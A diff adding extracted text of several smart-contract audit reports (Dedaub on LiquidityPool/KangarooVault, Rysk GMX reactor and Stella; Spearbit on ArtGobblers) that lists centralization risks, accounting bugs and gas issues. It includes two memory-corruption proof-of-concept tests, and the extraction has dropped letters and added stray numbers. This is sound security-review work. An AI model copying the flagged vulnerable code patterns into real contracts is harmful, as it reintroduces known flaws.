openLong. openLong passes the rounding error cost to the user by using mulWadUp for the tradeCost calculation. However, closeShort does not adopt this behavior and uses mulWadDown for the same calculation. We recommend changing this to be the same as openLong. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ID Description LiquidityPools and KangarooVaults admin can control the leverage and margin of the position +N1 20 STATUS OPE In LiquidityPool, the admin has increased power over its position leverage and the margin that is deposited to or withdrawn from the Synthetix Perp Market. More specically: First of all, the admin can arbitrarily set the leverage through the LiquidityPools updateLeverage function. Essentially, the risk of the LiquidityPool can be arbitrarily increased. LiquidityPool::updateLeverage() function updateLeverage(uint256 _leverage) external requiresAuth { require(_leverage >= 1e18); emit UpdateLeverage(futuresLeverage, _leverage); futuresLeverage = _leverage; } LiquidityPool::_calculateMargin() function _calculateMargin( int256 size ) internal view returns (uint256 margin) { (uint256 spotPrice, bool isInvalid) = baseAssetPrice(); require(!isInvalid && spotPrice > 0); uint256 absSize = size.abs(); margin = absSize.mulDivDown(spotPrice, futuresLeverage); } The admin is also responsible for managing the margin of the pools Synthetix Perp position. Via the LiquidityPool::increaseMargin function, the admin can use up to the whole available balance of the pool. The logic that decides when the aforementioned function is called is o-chain. LiquidityPool::increaseMargin() function increaseMargin( 2 uint256 additionalMargin ) external requiresAuth nonReentrant { perpMarket.transferMargin(int256(additionalMargin)); usedFunds += int256(additionalMargin); require(usedFunds <= 0 || totalFunds >= uint256(usedFunds)); emit IncreaseMargin(additionalMargin); } Additionally, the LiquidityPool::rebalanceMargin function can be used to increase or decrease the pools margin inside the limits set by the pools leverage and the margin limits set by Synthetix. Again the logic that decides the marginDelta parameter and calls rebalanceMargin is o-chain. The KangarooVault suers from similar centralization issues. Nevertheless, the function setLeverage of the KangarooVault does not allow the admin to set the leverage to more than 5x. N2 LiquidityPool admin can drain all deposited funds by being able to arbitrarily set the fee percentages OPEN In LiquidityPool, there are several functions that only the admin can control and allow him to parameterise all fee variables, such as deposit and withdrawal fees. However, there are no limits imposed on the values set for these variables. LiquidityPool::setFees() function setFees( uint256 _depositFee, uint256 _withdrawalFee ) external requiresAuth { ... // Dedaub: We recommend adding checks for depositFee and withdrawalFee // to prevent unrestricted fee rates 2 depositFee = _depositFee; withdrawalFee = _withdrawalFee; } This means that the admin could change the deposit/withdrawal fee and have all the newly deposited/withdrawn funds moved to the feeRecipient address. Apart from the obvious centralisation issue, such checks could prevent huge losses in the event of a compromise of the admin account or the protocol itself. On the other hand, such checks have been used in the KangarooVault and thus we strongly recommend adding them to LiquidityPool as well. KangarooVault::setFees() function setFees( uint256 _performanceFee, uint256 _withdrawalFee ) external requiresAuth { require(_performanceFee <= 1e17 && _withdrawalFee <= 1e16); ... performanceFee = _performanceFee; withdrawalFee = _withdrawalFee; } The same applies for the following functions that also need limits on the possible values that can be set by the admin: LiquidityPool::updateLeverage() (see also N1 for an example) LiquidityPool::updateStandardSize() LiquidityPool::setBaseTradingFee() LiquidityPool::setDevFee() LiquidityPool::setMaxSlippageFee() 2 OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ID Description +A1 Extra requirements can be added STATUS INFO Functions _addCollateral and _removeCollateral of the Exchange contract do not require that amount > 0. Function _liquidate does not require that debtRepaying > 0. +A2 ShortCollateral::approveCollateral does not check if the collateral is already approved INFO Function ShortCollateral::approveCollateral does not require that collateral.isApproved == false to disallow approving the same collateral more than once. +A3 LiquidityPool::hedgePositions can return early in some cases INFO In LiquidityPool::hedgePositions there is no handling of the case where newPosition is equal to 0 and the execution can return early. +A4 No pause logic used in KangarooVault INFO Core contracts of the protocol such as LiquidityPool and Exchange inherit the PauseModifier and use separate pause logic on several functions. In contrast, KangarooVault, which has an implemented logic similar to LiquidityPool, inherits the PauseModifier but it does not use the whenNotPaused modier on any function. +A5 Functions logic can be optimized to save gas INFO 2 In the functions LiquidityPool::processWithdraws and KangarooVault::processWithdrawalQueue, the LP token price is calculated in every iteration of the loop that processes withdrawals when in fact it does not change. Thus, the computation could be performed once, before the loop, to save gas. +A6 Unnecessary calls to LiquidityPool from KangarooVault INFO The functions removeCollateral and _openPosition of the KangarooVault contract, call LiquidityPool::getMarkPrice to get the mark price. However, this function only calls Exchange::getMarkPrice without adding any extra functionality. Therefore, we recommend making a direct call to Exchange::getMarkPrice from KangarooVault instead, to save some gas. +A7 Functions could be made external INFO The following functions could be made external instead of public, as they are not called by any of the contract functions: Exchange.sol refresh orderFee LiquidityPool.sol LiquidityToken.sol PowerPerp.sol ShortToken.sol refresh ShortCollateral.sol SynthetixAdapter.sol refresh getMinCollateral canLiquidate maxLiquidatableDebt getSynth getCurrencyKey getAssetPrice getAssetPrice SystemManager.sol init setStatusFunction 2 +A8 Redundant overrides INFO All function and storage variable overrides in the Exchange, LiquidityPool, ShortCollateral and SynthetixAdapter contracts are redundant and can be removed. +A9 Unused storage variables INFO There is a number of storage variables that are not used: Exchange:SUSD KangarooVault:maxDepositAmount LiquidityPool:addressResolver +A10 Storage variables can be made immutable INFO The following storage variables can be made immutable: SystemManager.sol SynthetixAdapter.sol addressResolver futuresMarketManager synthetix exchangeRates +A11 LiquidityPool::liquidate is not used INFO The function liquidate of the LiquidityPool contract is not called by the Exchange, which is the only contract that would be able to call it. At the same time, this means that the LiquidityPool::_hedge function is always called with its second argument being set to false. Furthermore, if this function is maintained for future use, we raise a warning here that hedgingFees are accounted for twice. Once by LiquidityPool::_hedge and another one directly inside liquidate function. LiquidityPool::liquidate() function liquidate( 2 uint256 amount ) external override onlyExchange nonReentrant { ... uint256 hedgingFees = _hedge(int256(amount), true); // Dedaub: hedgingFees are double counted here usedFunds += int256(hedgingFees); emit Liquidate(markPrice, amount); } +A12 Incorrect code comment INFO The code comment of KangarooVault::saveToken mentions Save ER +C20 token from the vault (not SUSD or UNDERLYING) when there is no notion of an UNDERLYING token. +A13 Typo in the use of the word recipient INFO In LiquidityPool, KangarooVault and ILiquidityPool, all appearances of the word recipient word contain a typo and are wrien as receipient. For example, the fee recipient storage variable is wrien as feeReceipient instead of feeRecipient. +A14 Code duplication INFO The functions canLiquidate and maxLiquidatableDebt of ShortCollateral.sol share a large proportion of their code. For readability this part coud be included in a separate method. +A15 A large liquidation bonus percentage could lead to a decrease instead of the expected increase- of the collateral ratio INFO A liquidation of a part of an underwater position is expected to increase its collateralization ratio. In a partial liquidation, the liquidator deletes part of the position 2 and gets collateral of the same value, but also some extra collateral as liquidation bonus. If the liquidation bonus percentage is large, the collateral ratio after the liquidation could be lower compared to the one before. The parameters of the protocol should be chosen carefully to avoid this problem. For example: WIPEOUT_CUTOFF * coll.liqRatio > 1 + coll.liqBonus +A16 No check that normalizationUpdate is positive INFO The functions getMarkPrice and updateFundingRate of the Exchange contract compute the normalizationUpdate variable using the formula: int256 totalFunding = wadMul(fundingRate, (currentTimeStamp - fundingLastUpdatedTimestamp)); int256 normalizationUpdate = 1e18 - totalFunding; Although the fundingRate is bounded (it takes values between -maxFunding and maxFunding), the dierence currentTimeStamp - fundingLastUpdatedTimestamp is not, therefore totalFunding can in principle have an arbitrarily large value, especially a value greater than 1e18 (using 18 decimals precision). The result would be a negative normalizationUpdate and negative mark price, which would mess all the computations of the protocol. A check that normalizationUpdate is positive could be added. Nevertheless, since the value of the maxFunding is 1e16, the protocol has to be inactive for at least 100 days, before this issue occurs. A17 Compiler version and possible bugs INFO The code can be compiled with Solidity 0.8.9 or higher. For deployment, we recommend no floating pragmas, but a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.9, in particular, has some known bugs, which we do not believe aect the correctness of the contracts. 2 diff --git a/findings_newupdate/dedaub/Rysk _ Rysk GMX Hedging Reactor Audit.txt b/findings_newupdate/dedaub/Rysk _ Rysk GMX Hedging Reactor Audit.txt new file mode 100644 index 0000000..6649953 --- /dev/null +++ b/findings_newupdate/dedaub/Rysk _ Rysk GMX Hedging Reactor Audit.txt @@ -0,0 +1,12 @@ +M1 GmxPositionRouter has unlimited spending approval RESOLVED In the GmxHedgingReactor constructor the gmxPositionRouter is approved to spend an innite amount of _collateralAsset. It appears that this is unneeded and potentially dangerous, as the transfer of _collateralAsset is actually handled by the 0 GMX router, which gets approved for the exact amount needed in the function _increasePosition, and not by the gmxPositionRouter. +M2 Inconsistent returns in _changePosition RESOLVED The function GmxHedgingReactor::_changePosition is not consistent with the values it returns. Even though it should always return the resulting dierence in delta exposure, it does not do so at the end of the if-branch of the if (_amount > 0) { } statement. If the control flow reaches that point, it jumps at the end of the function leading to 0 being returned, i.e., as if there was no change in delta. function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. // Dedaub: last statement is not a return increaseOrderDeltaChange[positionKey] += deltaChange; } else { // .. return deltaChange + closedPositionDeltaChange; } return 0; } We would suggest the following xes: function _changePosition(int256 _amount) internal returns (int256) { // .. if (_amount > 0) { // .. return deltaChange + closedPositionDeltaChange; } else if (_amount < 0) { // .. return deltaChange + closedPositionDeltaChange; } 0 return 0; } Currently the return value of _changePosition is further returned by the function hedgeDelta and remains unused by its callers. However, this could change in future versions of the protocol leading to bugs. +M3 GMX long and short positions could co-exist RESOLVED GMX treats longs and shorts as completely separate positions, and charges borrowing fees on both simultaneously, thus the reactor deals with positions in such a way that ensures only a single position is open at a certain time. Nevertheless, due to the two-step process that GMX uses to create positions and the fact that the reactor does not take into account that a new position might be created while another one is waiting to be nalized, there exists a scenario in which the reactor could end up with a long and a short position at the same time. The scenario is the following: 1. Initially, there are no open positions 2. A long or short position is opened on GMX but is not executed immediately, i.e., GmxHedgingReactor::gmxPositionCallback is not called. The LiquidityPool reckons that a counter position should be opened and calls GmxHedgingReactor::hedgeDelta to do so. 3. When the two position orders are nally executed by GMX the reactor will have a long and a short position open simultaneously. The above scenario might not be likely to happen as it requires the LiquidityPool to open two opposite positions in a very short period of time, i.e., before the rst position order is executed by a GMX keeper or a keeper of the protocol. Nevertheless, we believe it would be beer to also handle such a scenario, as it could mess up the reactors accounting and the x should be relatively easy. 0 +M4 _getCollateralSizeDeltaUsd() in some cases underestimates the extra collateral needed for an increase of a position ACKNOWLEDGED Whenever the hedging reactor asks for an increase of a position, _getCollateralSizeDeltaUsd() computes the extra collateral needed using collateralToTransfer (collateral needed to be added or removed from the position before its increase, to maintain the health to the desired value) and extraPositionCollateral (the extra collateral needed for the increase of the position).If isAboveMax==true and extraPositionCollateral > collateralToTransfer, then the collateral which is actually added is just totalCollateralToAdd= extraPositionCollateral - collateralToTransfer, which could be not suicient to collateralize the increased position. Let us try to explain this with an example. Suppose that initially there is a long position with position[0]=10_000, position[1]=5_000. Hedging reactor then asks for an increase of its position by 11_000. extraPositionCollateral will be 5_500. Suppose than in the meantime this position had substantial prots i.e. positive unrealised pnl=5_000. colateralToTransfer will be 5_000 and totalCollateralToAdd will be 5_500-5_000=500. Therefore the "leverage without pnl" of the new position will be (10_000+11_000)/(5_000+500)=21_000/5_500=3.8. If this scenario is repeated, it could lead to the liquidation of the position. We suggest adding a check that the total size of the position does not exceed its total collateral times maxLeverage, similar to the one used in the case of decreasing a position. 07 LOW SEVERITY: ID Descriptio STATUS +L1 setPositionRouter does not remove the old PositionRouter RESOLVED The function GmxHedgingReactor::setPositionRouter sets gmxPositionRouter to the new GMX PositionRouter contract that is provided and calls approvePlugin on the GMX Router contract to approve it. It does not revoke the approval to the old PositionRouter contract, which from now on is irrelevant to the reactor, by calling the function denyPlugin of the GMX Router contract. L2 Potential underflow in CheckVaultHealth RESOLVED If a position is in loss, the formula of the health variable is the following one: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():344 health=(uint256((int256(position[1])-int256(position[8])).div(int256(posit ion[0]))) * MAX_BIPS) / 1e18; There is no check if the dierence (int256(position[1])-int256(position[8])) in the above formula is positive or not. It is possible, under specic economic conditions (and if the GMX Liquidators are not fast enough), that the result of this dierence is negative. In such a case, the resulting value will be erroneous because of an underflow error. Even if this scenario is not expected to happen on a regular basis, we suggest adding a check that this dierence is indeed positive and if it is not extra measures should be taken to avoid liquidations. Note that the same issue appears in getPoolDenominatedValue, leading to the execution reverting if an underflow occurs. 0 CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ID Description +A1 getPoolDenominatedValue() wastes gas STATUS INFO The function GmxHedgingReactor::getPoolDenominatedValue wastes gas by calling the function checkVaultHealth to retrieve just the currently open GMX position instead of directly calling the _getPosition function. +A2 gmxPositionCallback() can be made more gas eicient INFO The function GmxHedgingReactor::gmxPositionCallback is responsible for updating the internalDelta of the reactor with the values that are stored in the mappings increaseOrderDeltaChange and decreaseOrderDeltaChange. These mappings are essentially used as temporary storage before the change in delta is applied to the internalDelta storage variable. Thus, after a successful update the associated mapping element should be deleted to receive a gas refund for freeing up space on the blockchain. +A3 sync() can be made more gas eicient INFO The function GmxHedgingReactor::sync is implemented to consider the scenario where a long and a short position are open on GMX at the same time. function sync() external returns (int256) { _isKeeper(); uint256[] memory longPosition = _getPosition(true); uint256[] memory shortPosition = _getPosition(false); uint256 longDelta = longPosition[0] > 0 ? 01 (longPosition[0]).div(longPosition[2]) : 0; uint256 shortDelta = shortPosition[0] > 0 ? (shortPosition[0]).div(shortPosition[2]) : 0; internalDelta = int256(longDelta) - int256(shortDelta); return internalDelta; } However, the reactor in whole is implemented in a way that ensures that a long and a short position cannot co-exist. Thus, the sync function can be implemented to take into account only the current open position, making it more eicient in terms of gas usage. +A4 Duplicate computations INFO In GmxHedgingReactor::_getCollateralSizeDeltaUsd there is the following code: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():670 if ( int256(position[1] / 1e12) - int256(adjustedCollateralToRemove) < int256(((position[0] - _getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000)) ) { adjustedCollateralToRemove = position[1] / 1e12 - ((position[0]-_getPositionSizeDeltaUsd(_amount,position[0])) / 1e12) / (vault.maxLeverage() / 11000); if (adjustedCollateralToRemove == 0) { return 0; } } Observe that the quantity (position[0]-_getPositionSizeDeltaUsd(_amount, position[0])) / 1e12) / (vault.maxLeverage() / 11000) is computed twice which can be avoided by computing it once and storing its value to a local variable. The same 01 is true for the quantity _amount.mul(position[2] / 1e12).div(position[0] / 1e12) that appears twice in the following computation: // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():651 collateralToRemove = (1e18 - ( (int256(position[0]/1e12)+int256((leverageFactor.mul(position[8]))/1e12)) .mul(1e18-int256(_amount.mul(position[2]/1e12).div(position[0]/1e12))) .div(int256(leverageFactor.mul(position[1])/1e12)) )).mul(int256(position[1]/1e12)) - int256(_amount.mul(position[2]/1e12).div(position[0]/1e12) .mul(position[8]/1e12)); The above computation can be simplied even further by applying specic mathematical properties: uint256 d = _amount.mul(position[2]).div(position[0]); collateralToRemove = (int256(position[1] / 1e12) - ( ((int256(position[0]) + int256(leverageFactor.mul(position[8]))) / 1e12) .mul(1e18 - int256(d)).div(int256(leverageFactor)) )) - int256(d.mul(position[8] / 1e12)); +A5 Duplicate calls INFO The functions _increasePosition and _decreasePosition of the reactor unnecessarily call gmxPositionRouters minExecutionFee function twice each instead of caching the returned value in a local variable after the rst call. +A6 Incorrect comment in _increasePosition INFO 01 The comment describing the parameter _collateralSize of the function _increasePosition should read amount of collateral to add instead of "amount of collateral to remove. +A7 Unused errors The following errors are dened but not used: INFO // GmxHedgingReactor.sol::_getCollateralSizeDeltaUsd():88 error ValueFailure(); error IncorrectCollateral(); error IncorrectDeltaChange(); error InvalidTransactionNotEnoughMargin(int256 accountMarketValue, int256 totalRequiredMargin); A8 Compiler bugs INFO The code is compiled with Solidity 0.8.9, which, at the time of writing, has some known bugs, which we do not believe to aect the correctness of the contracts. 01 diff --git a/findings_newupdate/dedaub/Stella _ Stella Audit - June '23.txt b/findings_newupdate/dedaub/Stella _ Stella Audit - June '23.txt new file mode 100644 index 0000000..2fbcf43 --- /dev/null +++ b/findings_newupdate/dedaub/Stella _ Stella Audit - June '23.txt @@ -0,0 +1,9 @@ +L1 Liquidation status depends heavily on o-chain code ACKNOWLEDGED Function BaseStrategy::liquidatePosition denes the condition that must be satised in order for a position to be considered liquidatable: BaseStrategy::LiquidatePosition():L349-356 if ( pos.status != PositionStatus.ACTIVE || (debtRatio +E18 < ONE_E18 && pos.startLiqTimestamp == 0 && pos.positionDeadline > block.timestamp) ) { revert PositionNotLiquidatable( _params.posOwner, _params.posId, pos.status ); } As one can observe, if liquidatePosition is called and it is true that debtRatioE18 < ONE_E18 but at the same time it holds that pos.startLiqTimestamp != 0, the position can get liquidated. How could this happen: 1. debtRatioE18 goes over 100% (ONE_E18) 2. the position is marked liquidatable, i.e., pos.startLiqTimestamp is set to a value dierent from 0 3. debtRatioE18 goes below ONE_E18 before the position gets liquidated due to the user adding extra collateral or due to the value of borrowed/collateral assets changing. At this point the position can get liquidated even though it is above water. At the same time, pos.startLiqTimestamp can only be set via BasePositionManager::markLiquidationStatus, a function which is intended mainly for position monitoring and liquidation bots to call. Thus, the marking and unmarking of positions depends heavily on o-chain code, meaning that there is always a chance that a previously unhealthy position, which becomes healthy, might not be marked as such and might get liquidated unfairly. As a general security practice, we recommend avoiding the dependence on o-chain logic as much as possible. Ideally, even in an extreme scenario in which all monitoring bots are down for a prolonged period of time, the eects on the protocol should not be unlimited. In case of liquidatePosition an extreme downtime scenario could lead to liquidating a position with arbitrarily low debt ratio if it remains marked. This could be avoided by checking inside the function whether the conditions for unmarking the position are satised, namely that the debt ratio is below unmarkLiqDebtRatioE18. The Stella team acknowledged the issue. Unfortunately, the use of bots for marking/unmarking positions is unavoidable. Also, the team would like to prevent the case where prices fluctuate around the 100% debt ratio, which can cause bots to mark and unmark too many times. That is why there is a dierent threshold, unmarkLiqDebtRatioE18, for the marking and unmarking. Our nal suggestion was to extend the liquidation condition by not allowing the liquidation of positions whose debt ratio is below unmarkLiqDebtRatioE18. L2 Sequencer downtime can cause large liquidation discount OPEN The time-based liquidation discount mechanism oers a 1% discount for each minute a position remains liquidatable. So if a liquidatable position has not been liquidated for 20 minutes, it will have a 20% discount (with a cap at 30%, that is 30 minutes). In contrast to issue L2, this mechanism does not rely on running our own bot, since anyone has incentive to liquidate a position. Still, the discount logic does interpret the fact that liquidation did not happen within 20 minutes as lack of incentive, requiring to lower the price. As a consequence, if the sequencer stays oline for 30 minutes (which is not that unlikely to happen), then when it resumes operation all positions marked as liquidatable before the downtime will have a 30% discount. If this risk is not acceptable, it could be avoided by requiring liquidators to enable the discount at regular intervals, before being allowed to use it. For instance they could be required to call a function every 5 or 10 minutes to enable the discount for the corresponding period, and then wait a bit before using this discount. This essentially proves that the system is live, and that any lack of liquidation is due to insuicient incentives and not due to technical reasons. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ID Description N1 Limiting the power of dev/exec wallets STATUS INFO The dev and exec multisig wallets have signicant power over the protocol as they can set all its dierent parameters, including access controllers, whitelisted borrowers (as mentioned in issue L1), the RiskFramework contract, the rewards vault, the oracle sources and many more. Nevertheless, the current codebase of the protocol does not provide any direct way to the owners of these wallets, even in a case of wallet compromise, to drain the protocol or steal user funds. The only exceptions to this are 1. What is described in issue L1, and 2. That the exec multisig is able transfer the whole balance of a rewards vault to the treasury, which is also controlled (set) by the exec multisig. Although some level of trust to these wallets is necessary, limiting their power as much as possible is preferable. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ID Description +A1 Borrower checks can be stricter STATUS RESOLVED In function LendingProxy::borrow it is checked that the msg.sender is whitelisted by querying the whitelistedBorrowers mapping, which can be only set by the exec role (multisig). However, it could also be required as an extra security measure that the msg.sender is a strategy registered in the StrategyRegistry contract, i.e., it has been created by one of the whitelisted strategy factories. This would make it much more diicult to add a non-legitimate strategy as a borrower even if the exec multisig got compromised. +A2 ER +C20 transfers might be of 0 value INFO The function LendingProxy::shareProfit does not check if the toTreasury and toRewardVault amounts used in the ERC20 safeTransferFrom calls are greater than 0. +A3 Number of decimals in oracles answer is hard-coded INFO In function ChainlinkAdapterOracle::getUSDPrice +E36 it is assumed that the number of decimals of the latestRoundData answer is 8 and 18 when the reference asset is USD and ETH respectively. Ideally one should use the decimals value returned by the latestRoundData function as the aforementioned assumption might not hold in the future. A4 Extra oracle checks INFO 1 Function ChainlinkAdapterOracle::getUSDPriceE36 could implement an extra check that ensures that the rate returned by the aggregators latestRoundData is greater than 0, as we expect that to hold for all asset prices. It could also be checked that the updatedAt value is not completely erroneous by requiring it be less or equal to the block.timestamp. +A5 Function can return early to save on gas INFO The function BasePositionViewer::calcProtInfo can return early, i.e., without calculating the yield and lender prots, which would be equal to 0, when the inputShare +E18 is equal to 100%. A6 Gas optimization in case of execution reversion INFO The minDesiredHealthFactorE18 check in function getLiquidationDiscountMultiplierE18 of the BasePositionViewer contract should be moved to the start of the function to reduce the consumed gas in cases where the execution reverts due to this check. A7 Compiler version and possible bugs INFO The code can be compiled with Solidity versions ^0.8.19. According to the foundry.toml le of the codebase, version 0.8.19 is currently used which has some known bugs, which we do not believe aect the correctness of the contracts. 1 diff --git a/findings_newupdate/spearbit/ArtGobblers-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/ArtGobblers-Spearbit-Security-Review.txt new file mode 100644 index 0000000..f0b09f3 --- /dev/null +++ b/findings_newupdate/spearbit/ArtGobblers-Spearbit-Security-Review.txt @@ -0,0 +1,25 @@ +5.1.1 The claimGobbler function does not enforce the MINTLIST_SUPPLY on-chain Severity: Low Risk Context: ArtGobblers.sol#L287-L304 Description: There is a public constant MINTLIST_SUPPLY (2000) that is supposed to represent the number of gobblers that can be minted by using merkle proofs. However, this is not explicitly enforced in the claimGobbler function and will need to be verified off-chain from the list of merkle proof data. The risk lies in the possibility of having more than 2000 proofs. Recommendation: Consider implementing the following recommendations. 1. The check can be enforced on-chain by adding a state variable to track the number of claims and revert if there are more than MINTLIST_SUPPLY number of claims. However, this adds a state variable which needs to be updated on each claim, thereby increasing gas costs. It is understandable if such suggestion is not implemented due to gas concerns. 2. Alternatively, publish the entire merkle proof data so that anyone can verify off-chain that it contains at most 2000 proofs. ArtGobblers: Documented this in ArtGobblers.sol#L335. /// @dev Function does not directly enforce the MINTLIST_SUPPLY limit for gas efficiency. The /// limit is enforced during the creation of the merkle proof, which will be shared publicly. +5.1.2 Feeding a gobbler to itself may lead to an infinite loop in the off-chain renderer Severity: Low Risk Context: ArtGobblers.sol#L653 Description: The contract allows feeding a gobbler to itself and while we do not think such action causes any issues on the contract side, it will nevertheless cause potential problems with the off-chain rendering for the gob- blers. The project explicitly allows feeding gobblers to other gobblers. In such cases, if the off-chain renderer is designed to render the inner gobbler, it would cause an infinite loop for the self-feeding case. Additionally, when a gobbler is fed to another gobbler the user will still own one of the gobblers. However, this is not the case with self-feeding,. Recommendation: Consider implementing the following recommendations. 1. Disallowing self-feeding. 2. If self-feeding is allowed, the off-chain renderer should be designed to handle this case so that it can avoid an infinite loop. ArtGobblers: Fixed in commit fa81257. Spearbit: Acknowledged. 4 +5.1.3 The function toString() does not manage memory properly Severity: Low Risk Context: LibString.sol#L7-L72 Description: There are two issues with the toString() function: 1. It does not manage the memory of the returned string correctly. In short, there can be overlaps between memory allocated for the returned string and the current free memory. 2. It assumes that the free memory is clean, i.e., does not explicitly zero out used memory. Proof of concept for case 1: function testToStringOverwrite() public { string memory str = LibString.toString(1); uint freememptr; uint len; bytes32 data; uint raw_str_ptr; assembly { // Imagine a high level allocation writing something to the current free memory. // Should have sufficient higher order bits for this to be visible mstore(mload(0x40), not(0)) freememptr := mload(0x40) // Correctly allocate 32 more bytes, to avoid more interference mstore(0x40, add(mload(0x40), 32)) raw_str_ptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint("memptr: ", freememptr); emit log_named_uint("str: ", raw_str_ptr); emit log_named_uint("len: ", len); emit log_named_bytes32("data: ", data); } Logs: memptr: : 256 str: : 205 len: : 1 data: : 0x31000000000000000000000000000000000000ffffffffffffffffffffffffff The key issue here is that the function allocates and manages memory region [205, 269) for the return variable. However, the free memory pointer is set to 256. The memory between [256, 269) can refer to both the string and another dynamic type that's allocated later on. Proof of concept for case 2: 5 function testToStringDirty() public { uint freememptr; // Make the next 4 bytes of the free memory dirty assembly { let dirty := not(0) freememptr := mload(0x40) mstore(freememptr, dirty) mstore(add(freememptr, 32), dirty) mstore(add(freememptr, 64), dirty) mstore(add(freememptr, 96), dirty) mstore(add(freememptr, 128), dirty) } string memory str = LibString.toString(1); uint len; bytes32 data; assembly { freememptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint("str: ", freememptr); emit log_named_uint("len: ", len); emit log_named_bytes32("data: ", data); assembly { freememptr := mload(0x40) } emit log_named_uint("memptr: ", freememptr); } Logs: str: 205 len: : 1 data: : 0x31ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff memptr: : 256 In both cases, high level solidity will not have issues decoding values as this region in memory is meant to be empty. However, certain ABI decoders, notably Etherscan, will have trouble decoding them. Note: It is likely that the use of toString() in ArtGobblers will not be impacted by the above issues. However, these issues can become severe if LibString is used as a generic string library. Recommendation: For LibString.sol#L22. the first case, we recommend allocating 160 bytes rather than 128 bytes in - + mstore(0x40, add(str, 128)) mstore(0x40, add(str, 160)) For the second case, the easiest fix would be to zero out the memory that follows the final character in the string. ArtGobblers: Fixed in Solmate. Spearbit: Acknowledged. 6 5.2 Gas Optimization +5.2.1 Consider migrating all require statements to Custom Errors for gas optimization, better UX, DX and code consistency Severity: Gas Optimization Context: ArtGobblers.sol, SignedWadMath.sol, GobblersERC1155B.sol, PagesERC721.sol Description: There is a mixed usage of both require and Custom Errors to handle cases where the transaction must revert. We suggest replacing all require instances with Custom Errors in order to save gas and improve user / developer experience. The following is a list of contract functions that still use require statements: • ArtGobblers mintLegendaryGobbler • ArtGobblers safeBatchTransferFrom • ArtGobblers safeTransferFrom • SignedWadMath wadLn • GobblersERC1155B balanceOfBatch • GobblersERC1155B _mint • GobblersERC1155B _batchMint • PagesERC721 ownerOf • PagesERC721 balanceOf • PagesERC721 approve • PagesERC721 transferFrom • PagesERC721 safeTransferFrom • PagesERC721 safeTransferFrom (overloaded version) Recommendation: Consider replacing all instances of the require statement with Custom Errors across the codebase. +5.2.2 Minting of Gobbler and Pages can be further gas optimized Severity: Gas Optimization Context: Pages.sol#L126-L143, ArtGobblers.sol#L310-L331 Description: Currently, in order to mint a new Page or Gobbler users must have enough $GOO in their Goo contract balance. If the user does not have enough $GOO he/she must call ArtGobblers.removeGoo(amount) to remove the required amount from the Gobbler's balance and mint new $GOO. That $GOO will be successively burned to mint the Page or Gobbler. In the vast majority of cases users will never have $GOO in the Goo contract but will have their $GOO directly stacked inside their Gobblers to compound and maximize the outcome. Given these premises, it makes sense to implement a function that does not require users to make two distinct transactions to perform: • mint $GOO (via removeGoo). • burn $GOO + mint the Page/Gobbler (via mintFromGoo). 7 but rather use a single transaction that consumes the $GOO stacked on the Gobbler itself without ever minting and burning any $GOO from the Goo contract. By doing so, the user will perform the mint operation with only one transaction and the gas cost will be much lower because it does not require any interaction with the Goo contract. Recommendation: Consider evaluating the possibility to allow users mint Gobbler's and Page's directly from the $GOO balance in ArtGobbler to save gas. Art Gobblers: Recommendation implemented in PR 113. Spearbit: Acknowledged. +5.2.3 Declare GobblerReserve artGobblers as immutable Severity: Gas Optimization Context: GobblerReserve.sol#L17 Description: The artGobblers in the GobblerReserve can be declared as immutable to save gas. - ArtGobblers public artGobblers; + ArtGobblers public immutable artGobblers; Recommendation: Declare the artGobblers variable as immutable. Art Gobblers: Recommendation implemented in the PR 111. Spearbit: Acknowledged. 5.3 Informational +5.3.1 Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function Severity: Informational Context: ArtGobblers.sol, GobblersERC1155B.sol Description: From the EIP-1155 documentation: Smart contracts implementing the ERC-1155 standard MUST implement all of the functions in the ERC1155 interface. Smart contracts implementing the ERC-1155 standard MUST implement the ERC- 165 supportsInterface function and MUST return the constant value true if 0xd9b67a26 is passed through the interfaceID argument. Neither GobblersERC1155B nor ArtGobblers are actually implementing the ERC-165 supportsInterface function. implementing the required ERC-165 supportsInterface function in the Recommendation: Consider GobblersERC1155B contract. ArtGobblers: Implemented in GobblersERC1155B.sol#L124 and PagesERC721.sol#L162. Spearbit: Acknowledged. 8 +5.3.2 LogisticVRGDA is importing wadExp from SignedWadMath but never uses it Severity: Informational Context: LogisticVRGDA.sol#L4 Description: The LogisticVRGDA is importing the wadExp function from the SignedWadMath library but is never used. Recommendation: Remove the wadExp to improve readability. -import {wadExp, wadLn, unsafeDiv, unsafeWadDiv} from "../lib/SignedWadMath.sol"; +import {wadLn, unsafeDiv, unsafeWadDiv} from "../lib/SignedWadMath.sol"; Art Gobblers: Recommendation implemented in the PR 111. Spearbit: Acknowledged. +5.3.3 Pages.tokenURI does not revert when pageId is the ID of an invalid or 